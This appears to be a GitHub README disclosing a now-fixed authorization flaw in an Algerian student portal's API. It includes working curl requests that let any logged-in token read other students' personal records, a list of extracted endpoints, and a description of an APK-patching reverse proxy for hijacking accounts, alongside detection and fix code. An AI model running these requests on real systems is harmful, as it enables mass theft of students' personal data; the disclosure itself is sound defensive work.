
AkramLZ/ProgresVulnerability


Ministry of Higher Education and Scientific Research

API Exposure vulnerability Documentation
SEVERITY: HIGH

In this repository, I will explain how the exploit against the ministry's student portal works and how attackers could access almost all data of students from every university and higher school.

Important

This vulnerability seems to have been fixed one year after I reported it: the API now uses UUIDs instead of the bac year and numerical ID, and the API URL changed to https://api-webetu.mesrs.dz/. An article about it was published at https://akraml.com/article/1


Abstract

The story behind how I discovered this exploit

I guess everyone noticed that the WebEtu application is laggy and very buggy. So, after some investigation, I noticed that the data in the app is not being saved properly, since it is all combined into one JSON string, which causes a huge performance impact during I/O operations. After I started the rewriting process, I noticed something wrong with the API queries: they just pass the student's BAC number (Matricule) and the student's bac year, and in some other cases the university's ID, and so on. So at this point I stopped the rewrite and started investigating how it works, and I discovered that after authenticating, the token you receive can access most, if not all, API endpoints, which exposes all students' information.

Demonstration

This exploit works by sending a request to the authentication API endpoint: https://progres.mesrs.dz/api/authentication/v1/.
The attacker sends a request with these headers:

Content-Type: application/json, text/plain, */*
User-Agent: okhttp/4.9.2 (Can be any OkHttp version)
Accept-Encoding: gzip

and with this JSON body:

{
  "username": "<progres-username>",
  "password": "<progres-password>"
}

After sending a proper request, the response should be something like this:

{
        "expirationDate": "2024-02-29T10:56:11.424+00:00",
        "token": "SECRET-TOKEN",
        "userId": 0,
        "idIndividu": 0,
        "etablissementId": 0,
        "userName": "<progres-username>"
}

And here we go, the first step is done. With this token we should have access to almost every endpoint under /api/infos/, not only the ones belonging to the authenticated student.


Chapter 1 - Why is this even possible?

Basically, either the authorization is hard-coded or the developer(s) didn't pay attention to this small detail: the server never checks that the token's owner matches the student named in the request. Any reverse-engineer with basic knowledge can find the API endpoints by reverse-engineering the WebEtu application, which is available on the Play Store and the App Store.

Chapter 2 - How does it happen?

As demonstrated above, this exploit starts by obtaining an API token from the authentication endpoint. Here is a simple curl command that shows how the app does it:

$ curl -X POST -H 'Content-Type: application/json, text/plain, */*' \
               -H 'Accept-Encoding: gzip' \
               -H 'User-Agent: okhttp/4.9.2' \
               -d '{"username": "<username>", "password": "<password>"}' \
               https://progres.mesrs.dz/api/authentication/v1/

After executing this command, it should return a JSON string containing your account data:

{
        "expirationDate": "2024-02-29T10:56:11.424+00:00",
        "token": "SECRET-TOKEN",
        "userId": 0,
        "idIndividu": 0,
        "etablissementId": 0,
        "userName": "<progres-username>"
}

But we only care about the token, since everything that follows depends on it.

Chapter 3.1 - What kind of information can we access?

Here is a list of all accessible endpoints. These URLs were extracted from the APK file of the WebEtu application for Android (placeholders such as <T> and <B> stand for the bac year and the student's matricule; <t>, <e>, <n> and the others are numeric IDs the app fills in):

/infos/bac/<T>/<B>/notes                                (GET)
/infos/demandeTransport/<T>/<B>/<t>                     (GET)
/infos/bac/<T>/<B>/individu                             (GET)
/infos/bac/<T>/<B>/dias                                 (GET)
/infos/logoEtablissement/<t>                            (GET)
/infos/bac/<T>/<B>/anneeAcademique/<t>/dia              (GET)
/infos/niveau/<t>/periodes                              (GET)
/infos/dia/<t>/groups                                   (GET)
/infos/bac/<T>/<B>/dias/<t>/periode/bilans              (GET)
/infos/Examens/<t>/niveau/<s>/examens                   (GET)
/infos/bac/<H>/<k>/dia/<K>/annuel/bilan                 (GET)
/infos/Examens/<e>/niveau/<n>/examens                   (GET)
/infos/AnneeAcademiqueEncours                           (GET)
/infos/bac/<T>/<B>                                      (GET)
/infos/image/<T>/<B>                                    (GET)
/infos/dettes/<T>/<B>                                   (GET)
/infos/congeacademiques/<T>/<B>                         (GET)
/infos/bac/<T>/<B>/demandesHebregement                  (GET)
/qitus/<T>/<B>/qitus                                    (GET)
/infos/checkHebregement/<H.id>                          (GET)
/infos/checkInscription/<H.id>                          (GET)
/infos/checkTransport/<H.id>                            (GET)
/infos/offreFormation/<e>/niveau/<Coefficients>         (GET)
/infos/controleContinue/dia/<e>/notesCC                 (GET)
/infos/niveau/<e>/periodes                              (GET)
/infos/planningSession/dia/<e>/noteExamens              (GET)
/infos/offreFormation/<e>/niveau/<n>/planningExamens    (GET)
/infos/bac/<H>/<k>/dias/<K>/periode/bilans              (GET)
/infos/bac/<H>/<k>/dia/<K>/annuel/bilan                 (GET)
/infos/Examens/<e>/niveau/<n>/examens                   (GET)
/authentication/v1/                                     (POST)
/infos/demanderRenouvellementHebregement/<G>/<N>/<t.id> (POST)

Chapter 3.2 - How can this information be accessed?

In Chapter 2, we explained how an attacker retrieves a token. After obtaining the token, you can send requests to any endpoint on the API server.
In this example, we use curl with /infos/bac/<T>/<B>/individu to show how it works:

$ curl -X GET -H 'Accept: application/json, text/plain, */*' \
              -H 'Accept-Encoding: gzip' \
              -H 'User-Agent: okhttp/4.9.2' \
              -H 'authorization: <TOKEN HERE>' \
              https://progres.mesrs.dz/api/infos/bac/2023/30000000/individu

After sending a proper request, the result should be like this:

{
  "id": 0,
  "identifiant": "xxxxxxxx-xxxx-xxxx",
  "dateNaissance": "1970-00-00T00:00:00.000+01:00",
  "nomArabe": "الإسم الأخير بالعربي",
  "nomLatin": "NAME IN LATIN",
  "prenomArabe": "الإسم الأول بالعربي",
  "prenomLatin": "FIRST NAME IN LATIN",
  "lieuNaissance": "Algeirs",
  "lieuNaissanceArabe": "الجزائر العاصمة",
  "photo": "xxxxx.jpg",
  "email": "student@mesrs.dz"
}

And here we go: we obtained the information of the student we targeted, even though the token was issued to a different account. This can also be automated to scrape data from the API, which would amount to a large-scale data breach.
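From the defender's side, the scraping described above leaves a clear trace: one token successfully reading records of many different students. The following detection logic is an added example and is not part of the original repository; the log format, the token fingerprints and the threshold are constructed for the illustration.

```javascript
// Added example (not the portal's code): flag tokens that read many different
// students' records in the API access log, which is what mass scraping through
// this flaw looks like. Log format and sample lines below are constructed.

// Owner-scoped routes from the endpoint list: .../<bac year>/<matricule>/...
const OWNER_ROUTE = /\/infos\/(?:bac|image|dettes|congeacademiques)\/(\d{4})\/(\d+)/;

// Constructed log lines: "<timestamp> <token-fingerprint> <method> <path> <status>".
const SAMPLE_LOG = `
2024-02-28T10:01:01Z tok-a1 GET /api/infos/bac/2023/30000000/individu 200
2024-02-28T10:01:02Z tok-a1 GET /api/infos/bac/2023/30000000/notes 200
2024-02-28T10:02:00Z tok-f9 GET /api/infos/bac/2023/30000000/individu 200
2024-02-28T10:02:01Z tok-f9 GET /api/infos/bac/2023/30000001/individu 200
2024-02-28T10:02:02Z tok-f9 GET /api/infos/bac/2023/30000002/individu 200
2024-02-28T10:02:03Z tok-f9 GET /api/infos/image/2023/30000003 200
2024-02-28T10:02:04Z tok-f9 GET /api/infos/bac/2022/30000004/individu 200
2024-02-28T10:02:05Z tok-f9 GET /api/infos/bac/2022/30000005/individu 403
`;

// A legitimate student token should only ever touch its own <T>/<B> pair,
// so more than maxDistinctStudents successful reads per token is suspicious.
function findEnumeratingTokens(logText, maxDistinctStudents = 1) {
  const studentsPerToken = new Map();
  for (const line of logText.split("\n")) {
    const fields = line.trim().split(/\s+/);
    if (fields.length < 5) continue;
    const [, token, , path, status] = fields;
    const m = OWNER_ROUTE.exec(path);
    if (!m || status !== "200") continue; // only successful reads of a student record
    const student = `${m[1]}/${m[2]}`;
    if (!studentsPerToken.has(token)) studentsPerToken.set(token, new Set());
    studentsPerToken.get(token).add(student);
  }
  const flagged = [];
  for (const [token, students] of studentsPerToken) {
    if (students.size > maxDistinctStudents) {
      flagged.push({ token, distinctStudents: students.size });
    }
  }
  return flagged;
}

console.log(findEnumeratingTokens(SAMPLE_LOG));
```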

Chapter 4 - Implementation in WebEtu Android application

This repository contains the source code of a reverse proxy that spoofs the authentication process to fake an identity and then gain full access to the target's account.
The source code of the reverse proxy can be found here.
After setting up the server properly, it should listen on port 1357. We dump the app into an APK file and then modify assets/index.android.bundle inside it. We need to locate the string https://progres.mesrs.dz/api/authentication/v1/ and replace it with our self-hosted reverse proxy, e.g. http://123.45.67.8:1357/api/authentication/v1/.
After doing these steps, re-signing the APK with a new keystore and installing it on our phone, we can log in to any account we want and gain full control.

Chapter 5 - Solution

The solution is simple: after generating the token, you should only give it access to its own account, by checking the bac year and the student's ID against the token's owner. I don't know how your backend server is written, so I cannot judge at this point. But your developer should understand what I mean.
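One way to implement that check, as an added example that is not the portal's own code: at login the server records which student the token belongs to, and every owner-scoped request is compared against that record. The session store, the claim names and the token strings are assumptions for the illustration.

```javascript
// Added example (not the portal's code): bind each /infos/bac/<T>/<B>/... request
// to the identity carried by the caller's token, so a token can only read its own
// student record. Assumes the server stored the owner's bac year and matricule
// when it issued the token (hypothetical claim names below).

// Constructed session store: opaque token -> claims fixed at login time.
const SESSIONS = new Map([
  ["tok-student-A", { bacYear: 2023, matricule: "30000000", idIndividu: 1 }],
  ["tok-student-B", { bacYear: 2022, matricule: "30000001", idIndividu: 2 }],
]);

// Routes from the endpoint list whose first two parameters are <T>/<B>.
const OWNER_SCOPED =
  /^(?:\/api)?\/(?:infos\/(?:bac|image|dettes|congeacademiques)|qitus)\/(\d{4})\/(\d+)(?:\/|$)/;

function authorizeRequest(authorizationHeader, path) {
  const claims = SESSIONS.get(authorizationHeader);
  if (!claims) return { status: 401, reason: "unknown or expired token" };

  const m = OWNER_SCOPED.exec(path);
  // Fail closed: routes keyed by other IDs (dia, niveau, ...) need their own
  // ownership lookup and are denied here until one exists.
  if (!m) return { status: 403, reason: "route has no ownership check" };

  const [, year, matricule] = m;
  // The actual fix: the path must name the same student the token was issued for.
  if (Number(year) !== claims.bacYear || matricule !== claims.matricule) {
    return { status: 403, reason: "token is not authorized for this student" };
  }
  return { status: 200, reason: "ok", idIndividu: claims.idIndividu };
}

// The request from Chapter 3.2 made with a token issued to a different student.
console.log(authorizeRequest("tok-student-B", "/api/infos/bac/2023/30000000/individu"));
```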

Conclusion

In the end, we can see how easy it is to exploit a vulnerability like this and abuse it at will, and how small bugs can cause large data breaches, as happens at many companies. So the best approach is to document the code and maintain it periodically.

About

A vulnerability / exploit discovered in the student platform https://progres.mesrs.dz/webetu which fully exposes students' data.
